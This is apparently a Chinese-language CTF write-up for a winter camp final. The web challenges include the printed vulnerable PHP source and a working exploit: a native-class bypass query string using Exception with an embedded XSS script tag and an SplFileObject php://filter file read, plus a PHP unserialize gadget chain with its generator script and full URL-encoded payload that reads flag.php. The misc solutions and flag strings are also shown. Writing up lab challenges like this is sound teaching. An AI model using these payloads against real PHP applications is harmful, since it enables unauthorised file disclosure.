第2届山石CTF冬令营结营赛wp

Primitive php

<?php
// Challenge source: prints itself, then instantiates classes named by the query string.
highlight_file(__FILE__);
//hint.php
// Only the *values* of $_GET are inspected, and only for the literal, case-sensitive
// substring "flag"; parameter names are not checked at all.
foreach ($_GET as $value) {
    if(preg_match("/flag/",$value)){
        die("不可以看flag啦,阿sir");
    }

}
// Both class names and the single constructor argument come straight from the request
// with no allowlist, so any loadable class (PHP built-ins included) can be instantiated.
// Mitigation: compare $_GET['class1'] / ['class2'] / ['class3'] against a fixed list of
// permitted class names before the `new`.
$a = new $_GET['class1']($_GET['a']);$b = new $_GET['class2']($_GET['b']);
// `$a !== $b` is object identity, so two distinct instances always satisfy it;
// md5() needs a string, so each object is converted through its __toString().
if ($a !== $b and md5($a)===md5($b))
{
    // The third object is string-converted as well when it is echoed.
    echo new $_GET['class3']($_GET['c']);
}

原生类绕过:参考:https://blog.csdn.net/qq_63928796/article/details/127786521
?class2=Exception&b=<script>alert('1')</script>&class1=Exception&a=<script>alert('1')</script>&class3=SplFileObject&c=php://filter/convert.base64-encode/resource=hint.php
filter流伪协议读到源码

<?php
// Emitted before the class definitions below, so every response starts with this text.
echo "no hint";
/**
 * Gadget class: eval() instantiates an arbitrary class and echoes it; __invoke()
 * forwards to a blue() method on $b1, which no class in this file defines, so on a
 * class with __call() (red) the call lands there instead.
 */
class blue
{
public $b1;   // class name (used by eval) or object (used by __invoke)
public $b2;   // constructor argument handed to the class named by $b1

// Instantiates the class named by $b1 with $b2 as its only argument and echoes the
// result; the echo string-converts it, so that class's __toString() runs here.
function eval() {
echo new $this->b1($this->b2);
}

// Runs when a blue instance is called as a function (see red::execute()/color::execute()).
public function __invoke()
{
$this->b1->blue();
}
}

/**
 * Gadget class: __destruct() string-converts $r1 (running its __toString()),
 * execute() calls $r1 as a callable (running its __invoke()), and __call()
 * catches any undefined method name and echoes $r1->getFlag().
 */
class red
{
public $r1;

// Runs when the object is destroyed; since unserialize() at the bottom of this file
// discards its result, that happens as soon as that statement finishes. The
// concatenation string-converts $r1, so an object stored there has its __toString()
// executed without any explicit call.
public function __destruct()
{
echo $this->r1 . '0xff0000';
}

// Calls $r1 as a function: a closure, a callable string, or an object with __invoke().
public function execute()
{
($this->r1)();
}

// Any method name not defined on red (e.g. the blue() call from blue::__invoke()) ends
// up here; $a (the name) and $b (the arguments) are ignored and $r1->getFlag() is echoed.
public function __call($a, $b)
{
echo $this->r1->getFlag();
}

}

/**
 * Gadget class: string conversion is the trigger. __toString() calls $w->execute()
 * before returning the fixed text 'hello'.
 */
class white
{
public $w;

// Runs whenever a white instance is used as a string (echo, concatenation, md5(), ...).
public function __toString()
{
$this->w->execute();
return 'hello';
}
}
/**
 * Gadget class: execute() calls $c1 as a callable; getFlag() reads and echoes
 * whatever path or stream wrapper $c1 names. This is the sink of the chain.
 */
class color
{
public $c1;

// Same shape as red::execute(): invokes $c1 (an object with __invoke(), or a callable).
public function execute()
{
($this->c1)();
}

// Arbitrary file read: $c1 reaches file_get_contents() unchecked, so any readable path
// or stream wrapper (php://filter, ...) is echoed. Mitigation: never let data that came
// out of unserialize() select this path; validate it against a fixed base directory.
public function getFlag()
{
echo file_get_contents($this->c1);
}

}

// Deserialises attacker-controlled POST data with no class restriction, which is what
// lets the gadget classes above be created with chosen property values.
// Mitigation: unserialize($s, ['allowed_classes' => false]) or a JSON format instead.
unserialize($_POST['cmd']);

反序列化构造payload
参考:
https://blog.csdn.net/cosmoslin/article/details/123829951
构造伪协议读取flag: php://filter/convert.base64-encode/resource=flag.php

<?php
/**
 * Serialisation stub mirroring hint.php's `blue`: same class and property names
 * (and order) so serialize() produces the shape the target will unserialize().
 * No behaviour from the original class is needed here.
 */
class blue
{
    public $b1;
    public $b2 = null;

    /**
     * @param mixed $b1 value stored in b1; b2 is left at null
     */
    public function __construct($b1)
    {
        $this->b1 = $b1;
    }
}

/**
 * Serialisation stub mirroring hint.php's `red`: only the property is reproduced
 * so that serialize() yields the same class/property layout.
 */
class red
{
    public $r1;

    /**
     * @param mixed $r1 value stored in r1
     */
    public function __construct($r1)
    {
        $this->r1 = $r1;
    }
}

/**
 * Serialisation stub mirroring hint.php's `white`: only the property is reproduced
 * so that serialize() yields the same class/property layout.
 */
class white
{
    public $w;

    /**
     * @param mixed $w value stored in w
     */
    public function __construct($w)
    {
        $this->w = $w;
    }
}
/**
 * Serialisation stub mirroring hint.php's `color`: only the property is reproduced
 * so that serialize() yields the same class/property layout.
 */
class color
{
    public $c1;

    /**
     * @param mixed $c1 value stored in c1
     */
    public function __construct($c1)
    {
        $this->c1 = $c1;
    }
}
// Assembles the nested object graph from the writeup, innermost object first, and prints
// its serialized form URL-encoded so it can be pasted verbatim into the `cmd` POST field.
$innermost = new color("php://filter/convert.base64-encode/resource=flag.php");
$reader = new red($innermost);
$caller = new blue($reader);
$invoker = new color($caller);
$stringer = new white($invoker);
$outermost = new red($stringer);
$payload = serialize($outermost);
echo urlencode($payload);


unserialize($_POST['cmd']); 通过 POST 传参 cmd
payload:
cmd=O%3A3%3A%22red%22%3A1%3A%7Bs%3A2%3A%22r1%22%3BO%3A5%3A%22white%22%3A1%3A%7Bs%3A1%3A%22w%22%3BO%3A5%3A%22color%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A4%3A%22blue%22%3A2%3A%7Bs%3A2%3A%22b1%22%3BO%3A3%3A%22red%22%3A1%3A%7Bs%3A2%3A%22r1%22%3BO%3A5%3A%22color%22%3A1%3A%7Bs%3A2%3A%22c1%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7Ds%3A2%3A%22b2%22%3BN%3B%7D%7D%7D%7D


:::tips
HSNCTF{537C532E-408B-FDCD-3E49-58E6FB578579}
:::

extract

用工具cloakify
kali:


打开保存的文件

改后缀zip

zip套娃,文件名递减1

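import os
import zipfile


def extract_nested_zips(count: int = 2331, folder: str = ".") -> int:
    """Unpack a chain of archives f<count>.zip, f<count-1>.zip, ..., f1.zip.

    Each archive is expected to contain the next one down, so extracting
    f<n>.zip into ``folder`` makes f<n-1>.zip available for the following pass.

    Args:
        count: number of the outermost archive (the original script used 2331).
        folder: directory holding the archives and receiving the extracted members
            (``"."`` reproduces the original script's behaviour).

    Returns:
        Number of archives extracted.

    Raises:
        FileNotFoundError: an expected archive is missing.
        zipfile.BadZipFile: an archive is malformed.
        The loop stops at the first failure rather than skipping it, as the
        original did.
    """
    extracted = 0
    for n in range(count, 0, -1):
        path = os.path.join(folder, f"f{n}.zip")
        # `with` closes the handle even when extraction raises; the original
        # closed it only on the success path.
        with zipfile.ZipFile(path) as archive:
            # extractall() strips absolute paths and '..' components from member
            # names, but it does not bound the decompressed size, so only run
            # this on archives whose origin you trust.
            archive.extractall(folder)
        extracted += 1
    return extracted


if __name__ == "__main__":
    # Guarded so importing this module does not start extracting in the cwd.
    extract_nested_zips()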

得到
:::tips
hsnctf{66eec912-e9ce-4e1d-ac54-ecea075dcb96}
:::

签到题


:::tips
hsnctf{welcome_to_hsnctf}
:::

外星电波~


得到一个加密的压缩包
NTFS数据流加密

得到音频,导出,sstv读

解压缩包得到flag
:::tips
hsnctf{70995fb0-eb60-0787-f305-77066aeb6730}
:::

daobudao



:::tips
hsnctf{g00d_luck_have_fun}
:::

S7_analysis

随便翻翻,看见一个stop

:::tips
hsnctf{399}
:::

